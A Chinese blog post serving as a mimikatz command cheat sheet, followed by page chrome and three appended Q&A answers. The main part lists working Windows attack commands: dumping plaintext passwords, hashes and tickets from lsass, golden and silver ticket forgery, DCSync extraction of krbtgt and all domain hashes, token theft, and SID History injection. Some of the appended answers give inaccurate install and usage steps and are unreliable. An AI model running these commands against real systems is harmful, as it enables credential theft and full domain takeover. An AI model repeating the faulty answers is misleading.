mimikatz使用详解

1. standard模块

这些standard命令几乎不常用 但是需要提一下base64

# 查看base64的支持
base64

# input 支持base64
base64 /input:on

# output 支持base64
base64 /output:on

# input 不支持base64
base64 /input:off

# output 不支持base64
base64 /output:off

2. 其他模块

  • • crypto 加密模块

  • • sekurlsa 用来枚举凭据的命令

  • • kerberos包模块

  • • ngc 下一代密码学模块

  • • privilege 提权模块

  • • process 进程模块

  • • service 服务模块

  • • lsadump模块

  • • ts 终端服务器模块

  • • event 事件模块

  • • misc 杂项模块

  • • token 令牌操作模块

  • • vault Windows凭据模块

  • • minesweeper模块

  • • dpapi模块

  • • busylight模块

  • • sysenv 系统环境值模块

  • • sid 安全标识符模块

  • • iis IIS XML配置模块

  • • rpc RPC控制

  • • sr98设备和T5577目标模块

  • • acr ACR模块

其中常用的是privilege、sekurlsa、kerberos、lsadump、token、sid模块

1. privilege模块

该模块是用于提权的模块,很多模块需要高权限运行,所以要先进行提权,只能用具有管理员权限的命令行窗口才可以执行成功,普通用户使用提权命令会失败

privilege::debug

2. sekurlsa模块

使用该模块需要高权限,因此需要执行提权命令,如下是常用命令

# 只抓取内存中保存的用户明文密码
mimikatz.exe "privilege::debug" "sekurlsa::wdigest" exit

# 只抓取内存中保存的用户Hash
mimikatz.exe "privilege::debug" "sekurlsa::msv" exit

# 只抓取内存中保存的用户密码的Key值
mimikatz.exe "privilege::debug" "sekurlsa::ekeys" exit

# 抓取内存中保存的用户所有凭据
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

# 加载dmp文件,并导出其中的明文密码
procdump.exe -accepteula -ma lsass.exe lsass.dmp
privilege::debug
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full

# 导出lsass.exe 进程中所有的票据
sekurlsa::tickets /export

从server2012开始,默认情况下,内存中不保存用户的 明文密码

3. kerberos模块

该模块是与Kerberos相关的模块

# 查看内存中的kerberos TGT
mimikatz.exe "kerberos::tgt" exit

# 查看内存中所有的Kerberos票据
mimikatz.exe "kerberos::list" exit

# 清除票据
mimikatz.exe "kerberos::purge" exit

# 将票据注入到内存中
mimikatz.exe "kerberos::ptt administrator.kirbi" exit

# 黄金票据传递攻击
kerberos::golden /user:要伪造的域用户 /domain:域名 /sid:域的sid /krbtgt:krbtgt的哈希或AES Key /ptt

# 白银票据传递攻击
kerberos::golden /user:要伪造的域用户 /domain:域名 /sid:域的sid /target:服务机器 /service:指定服务如cifs、ldap /rc4:服务账户的Hash /ptt

4. lsadump模块

改模块是对Local Security Authiruty(LSA)进行密码抓取的模块

# 通过DSync导出指定用户的Hash,格式化输出
lsadump::dcsync /domain:god.org /user:krbtgt /csv

# 通过DSync导出指定用户的密码Hash的详细信息
lsadump::dcsync /domain:god.org /user:krbtgt

# 通过DSync导出所有用户的Hash
lsadump::dcsync /domain:god.org /all /csv

# 读取所有域用户的Hash,需要在域控上以管理员权限打开窗口
privilege::debug
lsadump::lsa /patch

# 从sam.hive和system.hive文件中获得NTLM Hash
reg save hklm\sam sam.hive
reg save hklm\system system.hive
lsadump::sam /sam:sam.hive /system:system.hive

# 从本地SAM文件中读取密码Hash
privilege::debug
token::elevate
lsadump::sam

5. token模块

# 列出当前进程的token信息
token::whoami
token::whoami /full

# 列出当前系统中存在的token,高权限流出的token最全面
token::list

# 窃取指定token id的token
token::elevate /id

# 窃取System权限的token(默认)
token::elevate /system

# 窃取域管理员的token
token::elevate /domainadmin

# 窃取企业管理员的token
token::elevate /enterpriseadmin

# 窃取本地管理员的token
token::elevate /admin

# 窃取Local Service权限的token
token::elevate /localservice

# 窃取Network service权限的token
token::elevate /networkservice

# 恢复为之前的token
token::revert

6. sid模块

# 查询指定对象的SID
sid::lookup /name:xuan

# 查询指定SID对应的对象
sid::lookup /sid:S-1-5-21-1982601180-2087634876-2293013296-1001

# 通过samAccountName属性查询对象的一些信息
sid::query /sam:lzx

# 通过SID属性查询对象的一些信息
sid::query /sid:S-1-5-21-2952760202-1353902439-2381784089-1109

# 通过samAccountName属性修改对象的SID
sid::patch
sid::modify /sam:liu /new:S-1-5-21-2952760202-1353902439-2381784089-109

# 通过sid属性修改对象的SID
sid::patch
sid::modify /sid:S-1-5-21-1982601180-2087634876-2293013296-1001 /new:S-1-5-21-2952760202-1353902439-2381784089-109

# 通过samAccountName属性给对象添加一个SID History属性
sid::patch
sid::add /sam:lzx /new:S-1-5-21-2952760202-1353902439-2381784089-109

# 通过sid属性给对象添加一个SID History属性
sid::patch
sid::add /sid:S-1-5-21-1982601180-2087634876-2293013296-1001 /new:S-1-5-21-2952760202-1353902439-2381784089-109

# 将administrator的SID添加到test的SID History属性中
sid::patch
sid::add /sam:lzx /new:administrator

# 清除指定samAccountName对象的SID History属性
sid::clear /sam:xuan

# 清除指定sid对象的SID History属性
sid::clear /sid:S-1-5-21-1982601180-2087634876-2293013296-1001
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
### 回答1: 这是一个对于使用 Mimikatz 工具的教程。 Mimikatz 是一个开发者用来获取 Windows 认证凭证的工具,它可以解密 Windows 存储的密码,甚至可以获取经过 NTLM 身份验证的密码。 但请注意,使用这个工具可能会涉及到违法行为,请使用时慎重考虑。 ### 回答2: Mimikatz是一款用于提取Windows凭证的工具,它可以用来获取本地Windows用户和域用户的密码、NTLM哈希值和明文密码。本文将介绍如何通过Kali中的Mimikatz工具来实现提取凭证的操作。 1. 安装Mimikatz Mimikatz是Kali自带的工具,在终端中输入以下命令即可安装: ``` apt-get install mimikatz ``` 2. 运行Mimikatz 进入终端,输入以下命令来运行Mimikatz: ``` mimikatz ``` 如果你使用的是64位版本的系统,你还需要输入以下命令: ``` mimikatz # privilege::debug ``` 这个命令会给你的用户添加更多的访问权限,也就是所谓的debug权限。 3. 提取凭证 接下来,你可以通过以下命令来提取凭证: ``` mimikatz # sekurlsa::logonpasswords ``` 这个命令会输出本地计算机上所有用户的明文密码和NTLM哈希值。 如果你想获取域用户的凭证,可以使用以下命令: ``` mimikatz # sekurlsa::logonpasswords full ``` 这个命令会输出域控制器上所有域用户的明文密码和NTLM哈希值。 4. 清除日志和关闭Mimikatz 运行Mimikatz时默认会生成一些日志文件。如果你不希望这些日志留在计算机上,可以使用以下命令来清除日志: ``` mimikatz # log::clear ``` 最后,输入以下命令来关闭Mimikatz: ``` mimikatz # exit ``` 以上就是通过Kali中的Mimikatz工具来实现提取凭证的操作的详细教程。需要注意的是,Mimikatz是一款非常强大的工具,使用时请谨慎,避免造成不必要的损失。 ### 回答3: Kali是一个开源免费的渗透测试操作系统,而mimikatz是一个密码破解工具,常被黑客用于窃取用户密码,因此Kali与mimikatz结合使用可以进行密码破解和渗透测试。 首先,在Kali中下载安装mimikatz。打开终端,输入以下命令: git clone https://github.com/gentilkiwi/mimikatz.git 然后,进入mimikatz文件夹,编译mimikatz工具: cd mimikatz make 编译完成后,输入以下命令即可使用mimikatz: ./mimikatz 接下来,使用privilege模块提升权限: privilege::debug 然后,使用sekurlsa模块获取系统的登录凭据: sekurlsa::logonpasswords 最后,我们可以通过导出文件的方式保存密码信息,输入以下命令: sekurlsa::logonpasswords full log sekurlsa.log 这样就完成了在Kali中使用mimikatz的教程。需要注意的是,这种密码破解和窃取方法是非法的,只能在授权的渗透测试环境中使用。在实际的工作中,我们要始终遵循合法合规的原则,做好安全防护和风险评估工作,确保系统和数据的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值